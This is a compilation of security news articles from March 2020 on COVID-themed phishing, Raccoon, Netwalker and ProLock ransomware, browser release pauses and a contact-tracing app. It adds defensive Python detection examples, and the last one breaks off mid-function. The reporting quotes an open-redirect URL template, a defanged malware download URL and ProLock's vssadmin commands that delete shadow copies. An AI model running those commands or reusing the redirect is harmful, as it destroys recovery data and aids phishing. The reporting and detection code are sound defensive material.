HHS.gov is the website of the U.S. Department of Health & Human Services which makes this specific open redirect the perfect tool to lure in potential victims.

The open redirect (https://dcis.hhs.gov/cas/login?service=MALICIOUSURL&gateway=true) is present on the subdomain of HHS's Departmental Contracts Information System, and it was discovered and shared on Twitter by infosec analyst @SecSome.

Phishing email sample
Phishing email sample (SecSome)
The attackers use it to link to a malicious attachment containing a coronavirus.doc.lnk file which will unpack an obfuscated VBS script that will download and execute a Raccoon information stealer malware payload from http://185.62.188[.]204/hunt/post/corona.exe (VirusTotal analysis) after saving it to %Temp%\HhKFW.exe.

Raccoon (aka Legion, Mohazo, and Racealer) is an information-stealing malware initially spotted almost a year ago on cybercriminal forums and capable of stealing data such as email credentials, credit card info, cryptocurrency wallets, browser data, and system information.

A report from CyberArk says that Raccoon is capable of digging its way into about 60 different applications, from browsers, cryptocurrency wallets, email and FTP clients to steal and deliver sensitive information to its operators.

After executing the infostealer, the script also makes use of a decoy that shows an error message to make the victim think there is something wrong with the malicious document.

Decoy error message
The server previously used to deliver the malicious payload has since been taken down, although it will probably be replaced with a new one very soon.

BleepingComputer has also been told that the U.S. Department of Health and Human Services (HHS) has been notified of the redirect, and it will hopefully be taken offline soon.

While the current phishing campaign abusing HHS.gov open redirects only drops an infostealer as the final malware payload, it can be used to inflict much more damage if the threat actors ever decide to switch payloads.

As an extra tidbit of info, operators behind Netwalker Ransomware have used the same obfuscated VBS script template (in deobfuscated form here) to deliver their payloads in a campaign spotted by MalwareHunterTeam last week.

That series of attacks also used Coronavirus (COVID-19) phishing emails with attachments named 'CORONAVIRUS_COVID-19.vbs' containing an embedded Netwalker Ransomware executable as well as obfuscated code designed to extract and launch it on the compromised devices.

Coronavirus themed phishing and malware
To defend against similar attacks, always be suspicious of coronavirus-related attachments, especially those received from unknown senders. There is currently a huge influx of malicious campaigns that use the COVID-19 pandemic as a lure to steal personal information and deliver malware via phishing emails.

Additionally, always make sure that you have configured Windows Explorer to show file extensions for all file types as a lot of phishing attacks deliver malicious executables that pretend to be harmless docs. To do that uncheck the 'Hide extensions for known file types' in the File Explorer Options as shown in this tutorial.
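The reason that setting matters is visible in the file names from these two campaigns: with extensions hidden, coronavirus.doc.lnk is displayed as "coronavirus.doc". The following is an added Python example, not code from the article, showing what Explorer would display under each setting and a simple mail-gateway style classifier for attachment names; the extension sets are representative assumptions, not an exhaustive list of what Windows will execute.

```python
import os

# Representative set of extensions Windows runs directly on double-click
# (assumption for this example, not an exhaustive list).
EXECUTABLE_EXTENSIONS = {
    ".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".vbe", ".js",
    ".jse", ".wsf", ".wsh", ".ps1", ".hta", ".msi", ".lnk",
}
# Extensions borrowed to make an executable look like a harmless document.
DOCUMENT_LIKE_EXTENSIONS = {
    ".doc", ".docx", ".pdf", ".xls", ".xlsx", ".txt", ".rtf", ".jpg", ".png",
}
# Explorer never shows these, even with 'Hide extensions' unchecked.
ALWAYS_HIDDEN_EXTENSIONS = {".lnk", ".url"}


def displayed_name(filename, hide_known_extensions=True):
    """What File Explorer shows for `filename` under the given setting."""
    base = os.path.basename(filename.replace("\\", "/"))
    root, ext = os.path.splitext(base)
    ext = ext.lower()
    known = ext in EXECUTABLE_EXTENSIONS or ext in DOCUMENT_LIKE_EXTENSIONS
    if ext in ALWAYS_HIDDEN_EXTENSIONS or (hide_known_extensions and known):
        return root
    return base


def classify_attachment(filename):
    """Return (verdict, reason) for an attachment name.

    Executable types are blocked outright; the reason additionally calls out a
    document-looking double extension such as .doc.lnk so an analyst sees the
    disguise at a glance.
    """
    base = os.path.basename(filename.replace("\\", "/")).lower()
    root, ext = os.path.splitext(base)
    if ext not in EXECUTABLE_EXTENSIONS:
        return "allow", "not an executable type"
    inner_ext = os.path.splitext(root)[1]
    if inner_ext in DOCUMENT_LIKE_EXTENSIONS:
        return "block", f"executable {ext} disguised with {inner_ext} double extension"
    return "block", f"executable attachment type {ext}"


if __name__ == "__main__":
    # The two attachment names reported in the article.
    for name in ["coronavirus.doc.lnk", "CORONAVIRUS_COVID-19.vbs", "report.docx"]:
        print(name, "->", displayed_name(name), "|", classify_attachment(name))
```

Note the .lnk case: because Explorer hides that extension unconditionally, the "show extensions" setting helps against .doc.exe-style names but not against shortcut files, which is one reason gateway-side blocking of executable attachment types is the stronger control.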

Last month, the World Health Organization (WHO), the U.S. Federal Trade Commission (FTC), and the US Cybersecurity and Infrastructure Security Agency (CISA) have all warned about ongoing Coronavirus-themed phishing and cyberscams (1, 2, 3).


Google to Abandon Chrome 82 Development Due to Release Delays
28
.3.2020  Bleepingcomputer  Security

Due to the change in Google Chrome's release schedule because of the Coronavirus pandemic, Google has announced that they are no longer developing Chrome 82 and will skip to Chrome 83 instead.

Last week, Google announced that it was pausing releases of new milestone versions of the Chrome browser due to the adjusted employee work schedules during the Coronavirus outbreak.

This caused the Chrome 81 version that was scheduled for release on March 17th to not be released and stay in the Google Chrome Beta channel.

In a new post to the "Chromium Schedule Update" topic in the Chromium-dev discussion group, Jason Kersey, the Director of Technical Program Management at Google, announced that due to the schedule changes, they are going to abandon Chrome 82 altogether.

With this change, Google Chrome 81 (M81) will remain in the Beta until it is released on the Stable branch, Chrome 82 (M82) will be abandoned, and Chrome 83 (M83) will be moved to the development branch.

This is an update on our earlier decision to pause our branch and release schedule. As we adapt our future milestone schedules to the current change in schedule, we have decided to skip the M82 release to ensure we keep users safe and focus all efforts on maintaining stability.

Here are some of the immediate actions based on the above decision:

We will abandon current M82 branches, remove infra support, and stop testing/merges to the branches

We will not push any new M82 releases to Dev, and we will stop stabilization for Beta

We will move Dev channel to M83 asap

We will keep Beta channel on M81 until M83 is ready to be promoted

While it has not been specifically mentioned, it is assumed that Google Chrome 84 will move to Canary development branch over the next coming weeks.

These changes have not been made as of yet, and Chrome 82 is still in the Dev channel while Chrome 83 is still in the Canary channel.

Kersey states that there will be another update this week with more information about the upcoming changes.

At this time, Google has not officially announced when they will start releasing new versions of the browser, but if the schedule change lasts long enough, we could see further skipping of versions.


Windows Defender Bug in Windows 10 Skips Files During Scans
28
.3.2020  Bleepingcomputer  OS

For the past couple of weeks, Windows 10 users have been reporting that Windows Defender scans are skipping files due to a configured exclusion or network scanning setting.

The users who report receiving these messages, though, do not have any exclusions configured in the Windows Defender preferences.

Even still, when they conduct a Quick Scan or Full Scan using Windows Defender, a Windows 10 Action Center notification will be created that states that items were skipped during the scan with the following message:

Items skipped during scan
The Windows Defender Antivirus scan skipped an item due to an exclusion or network scanning settings.

In conversations with Günter Born who first reported it at BornCity, he told BleepingComputer that 80% of his German readers confirm the behavior, while 20% are not receiving it.

In tests conducted by BleepingComputer, we too were able to replicate the reported issue, as seen in the alert below, when performing scans in Windows 10.

Action Center alert generated by Windows Defender Bug
It is not clear when this issue started, but according to various reports [1, 2] it has been happening since around March 10th, 2020, which coincides with the March Patch Tuesday.

What is strange is that this issue is being reported under different Antimalware Client versions and does not affect everyone running the same engine version.

For example, in my tests, this issue was occurring in engine version 4.18.2003.6. Others reported it is also occurring in version 4.18.2003.6-1.

Antimalware Client Version: 4.18.2003.6
Engine Version: 1.1.16800.2
Antivirus Version: 1.311.1767.0
Antispyware Version: 1.311.1767.0
After receiving the notification, I checked my exclusions and as you can see there are none configured.

No configured exclusions
To be 100% sure there were no hidden exclusions or strange network settings, I used the following PowerShell command to pull the Windows Defender preferences.

Get-MpPreference | findstr /i "net exc"
As you can see, we have no configured exclusions and our network settings are configured to the default preferences.

Exclusion and network preferences configured in Windows Defender
This is a strange bug to be sure as there appears to be no common denominator that can be seen in affected users.

BleepingComputer has contacted Microsoft about the bug but has not heard back at this time.


Israel Govt's New 'Shield' App Tracks Your Coronavirus Exposure
28
.3.2020  Bleepingcomputer  BigBrothers

The Israeli Ministry of Health has released a new mobile app called "The Shield" that will alert users if they have been at a location in Israel at the same time as a known Coronavirus patient.

This app, available for both Android and iOS, works by collecting the GPS and SSID (WiFi network) information of a user's mobile device throughout the day. This data is saved only on the mobile device and is not transmitted to the Ministry of Health, other government agencies, or any organization.

When interviewing new Coronavirus patients, the Ministry of Health will ask for the locations that they visited throughout the day. If the patient volunteers, this information is then added to a JSON file that is downloaded by the app every hour so it has the latest information.

When using the app, it will compare your data to the data in the downloaded JSON file and if the app detects that you were exposed to a known Coronavirus patient, it will alert you with a message stating that a match was found.
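The privacy property the article describes rests on the comparison happening entirely on the device: the patient file is downloaded, the device's own GPS/SSID log is read, and only a local verdict is produced. The following is an added Python example of that matching logic, not the app's own code; the JSON schema, the 50 m radius and the 10-minute time slack are assumptions chosen for illustration, and both data sets are constructed samples.

```python
import json
import math
from datetime import datetime, timedelta

# Constructed sample of the hourly-downloaded patient-location file.  The real
# file format used by the Ministry of Health app is not described in the
# article, so this schema is an assumption made for the example.
PATIENT_JSON = """
[
  {"lat": 32.0853, "lon": 34.7818, "ssid": "CafeGuest",
   "start": "2020-03-20T10:00:00", "end": "2020-03-20T10:30:00"}
]
"""

# Constructed sample of what the device records locally during the day.
DEVICE_POINTS = [
    {"lat": 32.0854, "lon": 34.7819, "ssid": None,        "time": "2020-03-20T10:15:00"},
    {"lat": 32.0900, "lon": 34.7900, "ssid": "CafeGuest", "time": "2020-03-20T10:20:00"},
    {"lat": 32.0853, "lon": 34.7818, "ssid": None,        "time": "2020-03-20T15:00:00"},
]


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two latitude/longitude points."""
    r = 6371000.0
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = (math.sin(dphi / 2) ** 2
         + math.cos(phi1) * math.cos(phi2) * math.sin(dlam / 2) ** 2)
    return 2 * r * math.asin(math.sqrt(a))


def find_exposures(device_points, patient_entries, radius_m=50.0,
                   slack=timedelta(minutes=10)):
    """Compare locally stored device points against the patient list.

    A device point counts as an exposure when its timestamp falls inside the
    patient's visit window (widened by `slack` on each side) and it is either
    within `radius_m` of the reported position or on the same Wi-Fi SSID.
    Both inputs are local data; nothing here leaves the device.
    """
    matches = []
    for p in patient_entries:
        start = datetime.fromisoformat(p["start"]) - slack
        end = datetime.fromisoformat(p["end"]) + slack
        for d in device_points:
            t = datetime.fromisoformat(d["time"])
            if not (start <= t <= end):
                continue
            dist = haversine_m(d["lat"], d["lon"], p["lat"], p["lon"])
            if dist <= radius_m:
                reason = "distance"
            elif d.get("ssid") and d["ssid"] == p.get("ssid"):
                reason = "ssid"
            else:
                continue
            matches.append({"device_time": d["time"], "reason": reason,
                            "distance_m": round(dist, 1)})
    return matches


def exposure_report(matches):
    """The two messages the article says the app shows to the user."""
    return "Location match found" if matches else "No exposure detected"


if __name__ == "__main__":
    found = find_exposures(DEVICE_POINTS, json.loads(PATIENT_JSON))
    print(exposure_report(found))
    for m in found:
        print(m)
```

In the sample, the 10:15 point matches by distance (about 15 m away), the 10:20 point is almost a kilometre away but matches on SSID, and the 15:00 point is outside the visit window and does not match. Because false positives in the patient data propagate directly into these verdicts, the correction channel the article mentions for doctors is part of the design rather than an afterthought.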

Location Match found
Matched users will then be prompted to report their exposure to the Ministry of Health using this link (English link).

If you have not been exposed to any known Coronavirus patients, the app will alert you of this as well.

No Exposure
Due to the nature of the data collection from patients, there may be false positives while using the app. Doctors, for example, who know that no Coronavirus patient was at a specific location can report these false positives so it can be corrected in the data file.

It is important to note that this app relies on known information about existing Coronavirus patients.

As many carriers have no symptoms, the best preventative measures against the Coronavirus are to self-isolate, practice social distancing, wash your hands frequently, and work from home if possible.

Collected data is only saved on the device
As this app requests a great deal of security permissions on Android and is tracking your location throughout the day, people are rightfully concerned about the privacy ramifications of this app.

To assure users that the collected data is only being stored locally, Israel's Ministry of Health has released the source code for the app on GitHub under the MIT license so that other countries can also utilize it.

To ease concerns, a security review of the app was also conducted by Israeli cybersecurity firm Profero.

In a telephone conversation with Profero CEO Omri Moyal, BleepingComputer was told that his company has reviewed the code for the app and has confirmed that no data is being transmitted from the device.

Moyal told BleepingComputer that all GPS and collected data are saved internally on the device and compared locally on the app to the JSON file being updated by the Ministry of Health.

If a user has been notified that they were in the same location as a known patient, the Ministry of Health is not automatically alerted and it is up to the user to volunteer that they have potentially been exposed and are now in self-quarantine.

This is further outlined in a post by Moyal and in the included infographic below that explains in Hebrew how the data is collected and used.

Infographic shared by Profero
Moyal emphasized that the goal is to get Israeli users to install the app and stay protected from being exposed to the Coronavirus. Because of this, careful attention has been paid to the privacy of users and to sharing information only if the user specifically volunteers it.

In the future, Moyal told us that the app may ask users to voluntarily upload their GPS data if they have been exposed or are known to be infected with the virus. This could then be integrated into the app to add a greater degree of accuracy to its alerts.

It is not known if and when this feature will be added.


How to Make the Windows 10 Taskbar Completely Transparent
28
.3.2020  Bleepingcomputer  OS

Many users enjoy modifying their Windows 10 experience by changing user interface characteristics beyond what Microsoft intended. One popular mod is to make the Windows 10 taskbar completely transparent without any blur effects.

Out of the box, Windows 10 offers a Transparency setting that can be enabled under Settings > Personalization > Colors and then toggling on the 'Transparency effects' setting.

Windows 10 Color Settings
When enabled, though, you are left with an opaque experience where the color and text are shown through the taskbar, but it is not completely transparent as shown below.

Standard Windows 10 Transparency effects
Using the Windows Registry you can tweak it further so it becomes a bit more transparent by adding a DWORD (32-bit) value named UseOLEDTaskbarTransparency under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced Registry key and setting its value to 1.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"UseOLEDTaskbarTransparency"=dword:00000001

This can be done via the Registry Editor using the following steps below:

As you cannot launch programs via Windows Search, we need to launch the Registry Editor via the Run: dialog. To do that, press the Windows key + the R key at the same time to open the Run: dialog and then type Regedit and press the OK button.
Windows will display a UAC prompt asking if you wish to allow the Registry Editor to make changes to the system. Press the Yes button to continue.
Navigate to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced key.
Right-click on Search and select New and then DWORD (32-bit) Value as shown below.
You will be prompted to enter the name of the new value. Type UseOLEDTaskbarTransparency and press Enter on the keyboard. Double-click on UseOLEDTaskbarTransparency and set the value to 1 and then press the OK button.
When done, you should have a UseOLEDTaskbarTransparency value set to 1 as shown in the image below.
UseOLEDTaskbarTransparency Value Created
You can now close the Registry Editor and restart Windows Explorer or restart your computer.
Now go back into Settings > Personalization > Colors and toggle the Transparency effects setting from On to Off and then back to On again for the Registry change to go into effect.

You will now find that the taskbar has become a bit more transparent, but there is still a noticeable overlay effect.

More transparency through a Registry tweak
Going completely transparent
If you want to make your Windows 10 taskbar completely transparent, you will need to use a third-party program such as Classic Shell or TranslucentTB.

For this guide, we chose TranslucentTB as it is a small app whose only purpose is to make the taskbar completely transparent.

To get started, simply install the TranslucentTB app from the Microsoft Store and launch it. Once launched, it will automatically make your taskbar completely transparent.

Fully transparent taskbar using TranslucentTB
When you couple this with a high-resolution desktop background, you can achieve a beautiful effect where your taskbar icons appear to float on top of the background.

TranslucentTB with Desktop Background
Using TranslucentTB you can also configure it to automatically change the transparency effects of the taskbar as you perform different actions such as opening the Start Menu or use the search field.

For those looking to modify their Windows 10 desktop experience but are not ready for a complete overhaul, TranslucentTB is a great place to start.


Microsoft Pauses New Edge Browser Versions Due to Coronavirus
22
.3.2020  Bleepingcomputer  OS

Microsoft is pausing the releases of new major versions of the Edge browser, including version 81, to remain consistent with the Google Chrome releases, which were paused earlier this week.

Due to the Coronavirus pandemic, many companies, including Google and Microsoft, have their employees working from home to prevent the spread of the virus. This also disrupts normal routines and the ability to respond to bugs or issues that may arise when a new version is released.

This past Tuesday, Google Chrome 81 was expected to be released to the Stable channel but was never released.

On Wednesday Google explained that they are pausing all future releases of the Chrome browser, including Chrome 81, during the Coronavirus outbreak. Google will continue, though, to provide new releases of Chrome 80 to fix security bugs that are discovered.

As Microsoft Edge follows the same release cycle as Google Chrome, Microsoft Tweeted Friday that they have decided to follow Google's lead and have paused all major releases of the Edge browser.

In a later post to the Microsoft Edge blog, Microsoft reiterated that the releases are now paused, but that they will continue releasing security and stability updates to Microsoft Edge 80.

In light of current global circumstances, the Microsoft Edge team is pausing updates to the Stable channel for Microsoft Edge. This means that Microsoft Edge 81 will not be promoted to Stable until we resume these updates.

We are making this change to be consistent with the Chromium project, which recently announced a similar pause due to adjusted schedules, and out of a desire to minimize additional impact to web developers and organizations that are similarly impacted.

We will continue to deliver security and stability updates to Microsoft Edge 80. Preview channels (Canary, Dev, and Beta) will continue to update on their usual schedule.

All builds in the preview channels, though, will continue to be updated and released as per their usual schedule.


Netwalker Ransomware Infecting Users via Coronavirus Phishing
22
.3.2020  Bleepingcomputer  Ransomware

As if people did not have enough to worry about, attackers are now targeting them with Coronavirus (COVID-19) phishing emails that install ransomware.

While we do not have access to the actual phishing email being sent, MalwareHunterTeam was able to find an attachment used in a new Coronavirus phishing campaign that installs the Netwalker Ransomware.

Netwalker is a ransomware, formerly called Mailto, that has recently become active targeting enterprises and government agencies. Two widely reported Netwalker attacks are those on the Toll Group and the Champaign Urbana Public Health District (CHUPD) in Illinois.

The new Netwalker phishing campaign is using an attachment named "CORONAVIRUS_COVID-19.vbs" that contains an embedded Netwalker Ransomware executable and obfuscated code to extract and launch it on the computer.

VBS Attachment
When the script is executed, the executable will be saved to %Temp%\qeSw.exe and launched.

Netwalker Executable
Once executed, the ransomware will encrypt the files on the computer and append a random extension to encrypted file names.

Of particular interest, Head of SentinelLabs Vitali Kremez told BleepingComputer that this version of the ransomware specifically avoids terminating the Fortinet endpoint protection client.

When asked why they would do that, Kremez stated it may be to avoid detection.

"I suppose it might be because they have already disabled the anti-virus functionality directly from the customer admin panel; however, they do not want to trip an alarm by terminating the clients," Kremez told BleepingComputer.

When done, victims will find a ransom note named [extension]-Readme.txt that contains instructions on how to access the ransomware's Tor payment site to pay the ransom demand.

Netwalker Ransom Note
Unfortunately, at this time there is no known weakness in the ransomware that would allow victims to decrypt their files for free.

Instead, victims will need to either restore from backup or recreate the missing files.

Coronavirus attacks have become common
Due to the ongoing Coronavirus pandemic, threat actors have actively started using the outbreak as a theme for their phishing campaigns and malware.

We have seen the TrickBot trojan using text from Coronavirus related news stories to evade detection, a ransomware called CoronaVirus, the data-stealing FormBook malware spread through phishing campaigns, and even an email extortion campaign threatening to infect your family with Coronavirus.

This has led to the US Cybersecurity and Infrastructure Security Agency (CISA) to issue warnings about the rise of Coronavirus-themed scams and the World Health Organization (WHO) to release warnings of phishing scams impersonating their organization.

As threat actors commonly take advantage of topics that spread anxiety and fear, everyone must be more diligent than ever against suspicious emails and the promotion of programs from unknown sources.


UK Fintech Firm Finastra Hit By Ransomware, Shuts Down Servers
22
.3.2020  Bleepingcomputer  Ransomware

Finastra, a leading financial technology provider from the UK, announced that it had to take several servers offline following a ransomware attack detected earlier today.

The fintech company provides financial software and services to more than 9,000 customers of all sizes from 130 countries across the globe, including 90 of the top 100 banks globally.

Finastra also has over 10,000 employees working from 42 offices, including London, New York, and Toronto, and $1.9 billion in revenue.

Servers taken offline following attack
Earlier today, Finastra discovered the incident after its security team spotted potentially anomalous activity on some of the company's systems.

They immediately took some of the servers offline and started an investigation with the help of a leading digital forensics firm.

"At this time, we strongly believe that the incident was the result of a ransomware attack and do not have any evidence that customer or employee data was accessed or exfiltrated, nor do we believe our clients’ networks were impacted," Finastra's Chief Operating Officer Tom Kilroy said.

Finastra is currently working to bring back its systems online and to resolve the issues caused by part of the servers on the company's network being shut down.

"While we have an industry-standard security program in place, we are conducting a rigorous review of our systems to ensure that our customer and employee data continues to be safe and secure," Kilroy added.

"We have also informed and are cooperating with the relevant authorities and we are in touch directly with any customers who may be impacted as a result of disrupted service."

Finastra takes data security very seriously, and we have committed to updating our stakeholders regularly and providing more information as soon as our investigation into this matter continues. - Tom Kilroy

Vulnerable Pulse Secure VPN and Citrix servers
While the method used by the attackers to infiltrate Finastra's network was not disclosed, cyber threat intelligence firm Bad Packets says that it previously detected Pulse Secure VPN servers unpatched against the CVE-2019-11510 vulnerability.

If successfully exploited, CVE-2019-11510 could enable remote unauthenticated attackers to compromise vulnerable VPN servers, gain access to all active users as well as their plain-text credentials, and execute arbitrary commands.

Vulnerable Pulse Secure VPN servers were used as a point of entry by Sodinokibi (REvil) ransomware as part of an attack that took down the network of Travelex on December 31, 2019.

In January, the US Cybersecurity and Infrastructure Security Agency (CISA) alerted organizations to patch their Pulse Secure VPN servers to block attacks attempting to exploit this remote code execution (RCE) vulnerability.


Bad Packets also states that, on January 11, Finastra had four Citrix ADC (NetScaler) servers vulnerable to attacks targeting the critical CVE-2019-19781 vulnerability, a flaw that was actively exploited by hackers starting January 17 to plant backdoors and block subsequent exploitation attempts.

According to reports, the City of Potsdam had to sever its administration servers' Internet connection after a cyberattack took down Citrix ADC servers on the administration's network that were unpatched against the CVE-2019-19781 flaw.

Citrix released all the fixes needed to secure vulnerable Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP appliances against the actively exploited CVE-2019-19781 vulnerability on January 24.

Bad Packets Report (@bad_packets): Finastra also had four Citrix (NetScaler) servers vulnerable to CVE-2019-19781 on January 11, 2020. https://twitter.com/bad_packets/status/1216635462011351040

Bad Packets Report (@bad_packets): Servers vulnerable to CVE-2019-19781 by country:
🇺🇸 United States: 9,880
🇩🇪 Germany: 2,510
🇬🇧 United Kingdom: 2,028
🇨🇭 Switzerland: 1,094
🇦🇺 Australia: 1,076
🇳🇱 Netherlands: 713
🇨🇦 Canada: 682
🇫🇷 France: 591
🇮🇹 Italy: 568
🇳🇴 Norway: 446
All others: 5,533
https://docs.google.com/spreadsheets/d/1sJ8-cVyG4vFYq6-MGdapM1eAhUkoXIKlsmuzKdfD9Ys/edit?usp=sharing
(7:26 PM - Mar 20, 2020)


PwndLocker Fixes Crypto Bug, Rebrands as ProLock Ransomware
22.3.2020  Bleepingcomputer  Ransomware

PwndLocker has rebranded as the ProLock Ransomware after fixing a crypto bug that allowed a free decryptor to be created.

At the beginning of March, we reported on a new ransomware called PwndLocker that was targeting enterprise networks and demanding ransoms ranging from $175,000 to over $660,000 depending on the size of the network.

Soon after, Michael Gillespie of ID Ransomware and Fabian Wosar of Emsisoft were able to discover a weakness in the ransomware that allowed them to create a free decryptor for victims to get their files back without paying the ransom.

Rebranded as ProLock Ransomware
After their initial failure, the developers rebranded their infection as ProLock Ransomware and have started to target corporate networks once again.

According to Sophos researcher PeterM, the new ProLock Ransomware is being distributed through a BMP image file being stored in C:\ProgramData named WinMgr.bmp. Embedded in this image is the ransomware executable.

This BMP file renders properly in an image viewer, as shown below, with only a few dots appearing in the upper right corner.

WinMgr.bmp
If you view it through a hex editor, though, you can see that it includes binary data embedded in it as well.

Hex Edit of WinMgr.bmp
This binary data is then reassembled by a PowerShell script that injects it directly into memory.

PowerShell Script
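A defender's triage check for the BMP trick described above, added here as an example and not code from the article or from Sophos: it parses the BMP headers, computes where the pixel array should end and reports how much data trails it. The `inspect_bmp` and `make_bmp` helpers and the sample files they build are constructed for this demonstration.

```python
"""Flag BMP files that carry more bytes than their headers account for.

Added example, not code from the article or from Sophos: the ProLock
loader described above hides an executable inside a BMP that still
renders normally. A file whose pixel array ends well before the file
does is a cheap triage signal. The sample files built here are
constructed for the demonstration.
"""
import struct
from dataclasses import dataclass
from typing import Optional

FILE_HEADER_LEN = 14          # BITMAPFILEHEADER
INFO_HEADER_LEN = 40          # BITMAPINFOHEADER
CORE_HEADER_LEN = 12          # BITMAPCOREHEADER (old OS/2 format)
TAIL_THRESHOLD = 1024         # slack bytes before size alone counts as suspicious


@dataclass
class BmpFinding:
    declared_size: int        # bfSize from the file header
    actual_size: int          # bytes actually in the file
    pixel_end: int            # offset where the pixel array should end
    trailing_bytes: int       # bytes after the pixel array
    trailer_has_mz: bool      # trailing region starts with a PE "MZ" stub
    suspicious: bool


def _row_stride(width: int, bpp: int) -> int:
    """Bytes per pixel row: rows are padded to 4-byte boundaries."""
    return ((width * bpp + 31) // 32) * 4


def inspect_bmp(data: bytes) -> Optional[BmpFinding]:
    """Parse the BMP headers and measure what lies beyond the pixel array.

    Returns None when the buffer is not a (complete enough) BMP.
    """
    if len(data) < FILE_HEADER_LEN + 4 or data[:2] != b"BM":
        return None
    bf_size, _, _, off_bits = struct.unpack_from("<IHHI", data, 2)
    dib_size = struct.unpack_from("<I", data, FILE_HEADER_LEN)[0]
    if len(data) < FILE_HEADER_LEN + dib_size:
        return None                      # truncated DIB header
    if dib_size == CORE_HEADER_LEN:
        width, height, _, bpp = struct.unpack_from("<HHHH", data, 18)
        compression, image_size = 0, 0
    else:
        if len(data) < 38:
            return None
        width, height, _, bpp, compression, image_size = struct.unpack_from(
            "<iiHHII", data, 18)
    height = abs(height)                 # negative height = top-down bitmap
    if compression == 0:                 # BI_RGB: size follows from geometry
        expected = _row_stride(width, bpp) * height
    else:                                # compressed: trust biSizeImage
        expected = image_size
    pixel_end = off_bits + expected
    trailing = max(0, len(data) - pixel_end)
    has_mz = data[pixel_end:pixel_end + 2] == b"MZ"
    return BmpFinding(
        declared_size=bf_size,
        actual_size=len(data),
        pixel_end=pixel_end,
        trailing_bytes=trailing,
        trailer_has_mz=has_mz,
        suspicious=trailing > 0 and (has_mz or trailing >= TAIL_THRESHOLD),
    )


def make_bmp(width: int, height: int, tail: bytes = b"") -> bytes:
    """Build a minimal 24-bpp BMP (constructed test data), optionally with a tail."""
    stride = _row_stride(width, 24)
    row = bytes([0x20, 0x40, 0x60] * width) + b"\x00" * (stride - width * 3)
    pixels = row * height
    off_bits = FILE_HEADER_LEN + INFO_HEADER_LEN
    file_header = b"BM" + struct.pack("<IHHI", off_bits + len(pixels), 0, 0, off_bits)
    info_header = struct.pack("<IiiHHIIiiII", INFO_HEADER_LEN, width, height, 1, 24,
                              0, len(pixels), 2835, 2835, 0, 0)
    return file_header + info_header + pixels + tail


if __name__ == "__main__":
    samples = (("clean.bmp", make_bmp(4, 3)),
               ("stuffed.bmp", make_bmp(4, 3, tail=b"MZ" + b"\x90" * 2000)))
    for label, blob in samples:
        f = inspect_bmp(blob)
        print(f"{label}: declared={f.declared_size} actual={f.actual_size} "
              f"trailing={f.trailing_bytes} mz={f.trailer_has_mz} "
              f"suspicious={f.suspicious}")
```

A renderer stops reading at the pixel array, so the appended payload never affects how the image looks; comparing `pixel_end` with the real file length is what exposes it.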
Peter stated that this attack has been seen against a few servers, but it is not quite known how they got access. It is suspected that the attackers gained access through exposed Remote Desktop services.

"They targeted a handful of servers. Not sure how they got in (yet) but I can see quite a few keygens and cracking tools on the network, probably just end up being an exposed RDP though :-)," Peter stated in a Tweet.

As the attackers have full access to the network, it is unclear why they are hiding the ransomware executable in a BMP image file.

It is most likely being done to evade detection by security software as the ransomware is deployed throughout the network using tools like PowerShell Empire or PsExec.

ProLock encryption method
Otherwise, ProLock's encryption routine is the same as PwndLocker's.

When launched, it will clear the shadow volume copies on the machine so that they cannot be used to recover files:

vssadmin.exe delete shadows /all /quiet
vssadmin.exe resize shadowstorage /for=D: /on=D: /maxsize=401MB
vssadmin.exe resize shadowstorage /for=D: /on=D: /maxsize=unbounded
It will then start encrypting files on the computer, skipping any with the following extensions as well as files in operating system and common application folders:

.exe, .dll, .lnk, .ico, .ini, .msi, .chm, .sys, .hlf, .lng, .inf, .ttf, .cmd, .bat, .vhd, .bac, .bak, .wbc, .bkf, .set, .win, .dsk
When encrypting files, it will append the .proLock extension to each encrypted file's name. For example, 1.doc will be encrypted and renamed 1.doc.proLock.

ProLock encrypted files
In each folder that has been scanned for files, ProLock will create a ransom note named [HOW TO RECOVER FILES].TXT that contains instructions on how to connect to a Tor site for payment information.

ProLock Ransom Note
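The behaviour chain above (vssadmin shadow-copy removal, files renamed to .proLock, a ransom note per folder) as a host-based detection, added here as an example and not code from the article. The pipe-separated event format, host names and the `summarize`/`alert_hosts` helpers are assumptions constructed for the demonstration.

```python
"""Match the ProLock host behaviour described above against event logs.

Added example, not code from the article: the three vssadmin commands,
files renamed to .proLock and a ransom note dropped in every folder map
to a small host-based detection. The event format and the event lines
are constructed for the demonstration; point the parser at your own
Sysmon or EDR export instead.
"""
import re
import shlex
from collections import Counter, defaultdict
from typing import Dict, List, Optional

RANSOM_NOTE = "[HOW TO RECOVER FILES].TXT"
ENCRYPTED_EXT = ".prolock"           # matched case-insensitively

# Constructed events: "<type>|<host>|<detail>", where detail is a command
# line for "proc" events and a created path for "file" events.
EVENTS = [
    "proc|ws01|C:\\Windows\\System32\\vssadmin.exe delete shadows /all /quiet",
    "proc|ws01|vssadmin.exe resize shadowstorage /for=D: /on=D: /maxsize=401MB",
    "proc|ws01|vssadmin.exe resize shadowstorage /for=D: /on=D: /maxsize=unbounded",
    "proc|ws01|vssadmin.exe list shadows",
    "file|ws01|C:\\Users\\alice\\Documents\\1.doc.proLock",
    "file|ws01|C:\\Users\\alice\\Documents\\[HOW TO RECOVER FILES].TXT",
    "file|ws01|C:\\Users\\alice\\Pictures\\[HOW TO RECOVER FILES].TXT",
    "file|ws02|C:\\Users\\bob\\report.docx",
    "proc|ws02|vssadmin.exe list writers",
]


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1]


def classify_vssadmin(cmdline: str) -> Optional[str]:
    """Label shadow-copy removal. Shrinking shadowstorage also purges
    existing shadow copies, so the resize form is treated like the delete form."""
    try:
        argv = shlex.split(cmdline, posix=False)   # keep Windows backslashes
    except ValueError:
        return None
    if not argv or _basename(argv[0]).lower() not in ("vssadmin", "vssadmin.exe"):
        return None
    verbs = [a.lower() for a in argv[1:3]]
    if verbs == ["delete", "shadows"]:
        return "shadow_delete"
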